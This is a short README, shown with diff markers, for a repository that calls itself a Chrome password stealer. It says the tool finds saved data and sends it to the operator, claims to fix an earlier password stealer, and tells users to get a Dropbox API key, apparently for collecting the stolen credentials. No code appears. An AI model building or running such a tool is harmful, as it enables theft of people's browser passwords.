SaiTeja69/Chrome_pass_stealer/README.md

 Finds the data , pushes it back to you.

 An Improvised Version of [Shaskank Chandak's Password Stealer](https://github.com/shashankchandak/PasswordStealer).
+What's improved you may ask?
+That version doesn't work!

 ### Before you begin
 - Get an DropBox API key from [Here](https://blogs.dropbox.com/developers/2014/05/generate-an-access-token-for-your-own-account/)